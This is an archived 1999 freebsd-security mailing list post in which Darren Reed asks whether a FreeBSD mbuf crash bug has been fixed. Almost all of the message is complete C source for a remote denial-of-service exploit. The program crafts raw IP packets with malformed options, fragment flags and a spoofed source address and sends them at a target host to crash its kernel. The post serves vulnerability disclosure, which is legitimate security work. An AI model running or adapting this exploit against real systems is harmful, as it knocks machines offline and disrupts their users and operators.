From owner-freebsd-security Tue May 4 8:52:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id 4D2FD14FBD for ; Tue, 4 May 1999 08:52:28 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id BAA29421 for freebsd-security@freebsd.org; Wed, 5 May 1999 01:26:39 +1000 (EST) From: Darren Reed Message-Id: <199905041526.BAA29421@cheops.anu.edu.au> Subject: freebsd mbuf crash To: freebsd-security@freebsd.org Date: Wed, 5 May 1999 01:26:38 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org is this one (below) taken care of ? perhaps a derivitice of this ? darren /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998. * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine. */ #include #include #include #define __FAVOR_BSD #include #include #include #include #include #include u_long htona(char *host) { u_long addr; struct hostent *hp; if ((addr=inet_addr(host)) == INADDR_NONE) { if ((hp = gethostbyname(host)) == NULL) return(-1); bcopy(hp->h_addr_list[0], &addr, sizeof(addr)); } return(addr); } int main(int argc, char* argv[]) { char buf[128]; struct ip *iph = (struct ip *)buf; u_char *ipoptions = (u_char *)(buf + sizeof(struct ip)); struct tcphdr *tcph = (struct tcphdr *)(buf + 60); int s, i; struct sockaddr_in sin; if (argc != 2) { printf("usage\n\t%s \n", argv[0]); exit(1); } s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (s < 0) { perror("socket"); exit(1); } sin.sin_family = AF_INET; sin.sin_port = htons(7); sin.sin_addr.s_addr = htona(argv[1]); if (sin.sin_addr.s_addr == -1) { printf("Error resolving %s\n", argv[1]); exit(1); } bzero(buf, sizeof(buf)); iph->ip_hl=15; iph->ip_v=4; iph->ip_len=htons(124); iph->ip_id= htons(getpid()); iph->ip_off= htons(IP_MF); iph->ip_ttl = 255; iph->ip_p = IPPROTO_TCP; bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long)); iph->ip_src.s_addr = htona("10.2.3.4"); for (i = 0; i < 20;i++) { ipoptions[i]=0xff; } ipoptions[0] = 0xff; /* Made up option */ ipoptions[1] = 0x1a; memset((char *)&ipoptions[2], 0xff, 37); ipoptions[39] = 1; /* IP_NOP */ tcph->th_sport = htons(5505); tcph->th_dport = htons(23); tcph->th_seq = htonl(0xabcde123); tcph->th_ack = htonl(0x321edcba); tcph->th_flags = TH_ACK | TH_PUSH; tcph->th_win = htons(0x1234); if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) { perror("sendto"); exit(1); } if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) { perror("sendto"); exit(1); } iph->ip_len = htons(80); iph->ip_off = htons(8); if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) { perror("sendto"); exit(1); } exit(0); } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message